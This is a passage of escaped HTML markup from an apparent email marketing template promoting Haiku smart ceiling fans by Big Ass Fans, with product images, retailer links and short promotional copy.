width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:80px 10px 15px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Montserrat\',sans-serif; font-size: 14px; font-weight: 700; color: #236fa1; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\"><span style=\\\"font-size: 44px; line-height: 19.6px;\\\"><strong>HAIKU<\\/strong><\\/span><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 19.6px; font-family: inherit;\\\"><span style=\\\"line-height: 19.6px;\\\"><span style=\\\"line-height: 19.6px;\\\"><strong>The Smart Ceiling Fan of the Future - Big Ass Fans<\\/strong><\\/span><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 30px 80px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\" style=\\\"height:37px; v-text-anchor:middle; width:114px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#e03e2d;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #e03e2d; background-color: #ffffff; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">Let\'s Start<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"298\\\" style=\\\"width: 298px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_2\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 40px 0px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #e67e23; line-height: 140%; text-align: right; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: inherit; font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\">H E L L O<\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 28px; font-size: 20px;\\\"><span style=\\\"line-height: 28px;\\\"><strong>HAIKU SMART FANS<\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677136007974-haiku-finishes.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 30px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #a5a5a5; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%; text-align: left;\\\">You deserve a ceiling fan that adds to the beauty of your home and makes your life simpler. Handcrafted with premium materials and engineered with cutting-edge smart home technology, Haiku represents the pinnacle in style and innovation for ceiling fans. More than 75 international awards attest to its quality, while its world-leading efficiency makes it the perfect choice for energy-conscious homeowners.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" style=\\\"height:37px; v-text-anchor:middle; width:197px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#c97a14\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #c97a14; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">Read More Haiku Fans<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #b6b6b6;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/www.youtube.com\\/watch?v=U00KePkHbJ8\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677501625283-haiku-fans-residential.png\\\" alt=\\\"Video gi\\u1edbi thi\\u1ec7u c\\u00f4ng ngh\\u1ec7 qu\\u1ea1t Haiku\\\" title=\\\"Video gi\\u1edbi thi\\u1ec7u c\\u00f4ng ngh\\u1ec7 qu\\u1ea1t Haiku\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #b6b6b6;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_2\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 7px 10px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122542378-h-1.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 80%;max-width: 146.4px;\\\" width=\\\"146.4\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-weight: 700; color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\"><strong>Model: Haiku 84 inch - Moso Bambo Airfoils<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #c97a14; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-84inch\\\" target=\\\"_blank\\\"><strong><span style=\\\"font-size: 14px; line-height: 19.6px; font-family: Lato, sans-serif;\\\">R e a d\\u00a0 \\u00a0M o r e &gt;&gt;<\\/span><\\/strong><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_3\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 0px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122670015-h-2.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 75%;max-width: 150px;\\\" width=\\\"150\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" 